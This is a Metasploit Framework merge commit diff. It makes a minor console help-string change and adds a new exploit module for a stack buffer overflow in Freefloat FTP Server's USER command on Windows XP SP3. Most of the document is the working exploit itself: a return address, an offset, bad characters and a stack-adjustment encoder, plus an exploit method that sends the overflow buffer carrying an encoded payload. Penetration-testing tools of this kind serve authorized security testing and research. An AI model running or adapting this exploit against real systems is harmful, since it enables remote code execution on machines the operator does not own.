Merge branch 'master' of https://github.com/rapid7/metasploit-framework

2013-04-16 21:11:55 -05:00 · 2013-04-16 21:11:55 -05:00 · 088eb8618d
parent cc35591723 4e8d32a89a
commit 088eb8618d
2 changed files with 79 additions and 2 deletions
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@ -3066,8 +3066,8 @@ class Core
 			[ 'MinimumRank', framework.datastore['MinimumRank'] || '', 'The minimum rank of exploits that will run without explicit confirmation' ],
 			[ 'SessionLogging', framework.datastore['SessionLogging'] || '', 'Log all input and output for sessions' ],
 			[ 'TimestampOutput', framework.datastore['TimestampOutput'] || '', 'Prefix all console output with a timestamp' ],
-			[ 'Prompt', framework.datastore['Prompt'] || '', 'The prompt string, defaults to "#{Msf::Ui::Console::Driver::DefaultPrompt}"' ],
-			[ 'PromptChar', framework.datastore['PromptChar'] || '', 'The prompt character, defaults to ">"' ],
+			[ 'Prompt', framework.datastore['Prompt'] || '', "The prompt string, defaults to \"#{Msf::Ui::Console::Driver::DefaultPrompt}\"" ],
+			[ 'PromptChar', framework.datastore['PromptChar'] || '', "The prompt character, defaults to \"#{Msf::Ui::Console::Driver::DefaultPromptChar}\"" ],
 			[ 'PromptTimeFormat', framework.datastore['PromptTimeFormat'] || '', 'A format for timestamp escapes in the prompt, see ruby\'s strftime docs' ],
 		].each { |r| tbl << r }

--- a/modules/exploits/windows/ftp/freefloatftp_user.rb
+++ b/modules/exploits/windows/ftp/freefloatftp_user.rb
@ -0,0 +1,77 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#	http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::Ftp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'			 => 'Free Float FTP Server USER Command Buffer Overflow',
+			'Description'	 => %q{
+					Freefloat FTP Server is prone to an overflow condition. It
+				fails to properly sanitize user-supplied input resulting in a
+				stack-based buffer overflow. With a specially crafted 'USER'
+				command, a remote attacker can potentially have an unspecified
+				impact.
+			},
+			'Platform'		 => 'win',
+			'Author'		 =>
+				[
+					'D35m0nd142', # Original exploit
+					'Doug Prostko <dougtko[at]gmail.com>' # MSF module
+				],
+			'License'		 => MSF_LICENSE,
+			'References'	 =>
+				[
+					[ 'OSVDB', '69621'],
+					[ 'EDB', '23243']
+				],
+			'Privileged'	 => false,
+			'Payload'		 =>
+				{
+					'Space'          => 444,
+					'DisableNops'    => true,
+					'BadChars'       => "\x00\x0a\x0d",
+					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+				},
+			'Targets'		=>
+				[
+					[ 'FreeFloat / Windows XP SP3',
+						{
+							'Ret' => 0x77c35459 , # push esp; ret - mscvrt.dll
+							'Offset'   => 230
+						}
+					],
+				],
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Jun 12 2012'))
+	end
+
+	def check
+		connect
+		disconnect
+		if (banner =~ /FreeFloat/)
+			return Exploit::CheckCode::Vulnerable
+		else
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+	def exploit
+		connect
+		buf = rand_text(target['Offset'])
+		buf << [ target['Ret'] ].pack('V')
+		buf << rand_text(8)
+		buf << payload.encoded
+		send_user(buf)
+		disconnect
+	end
+end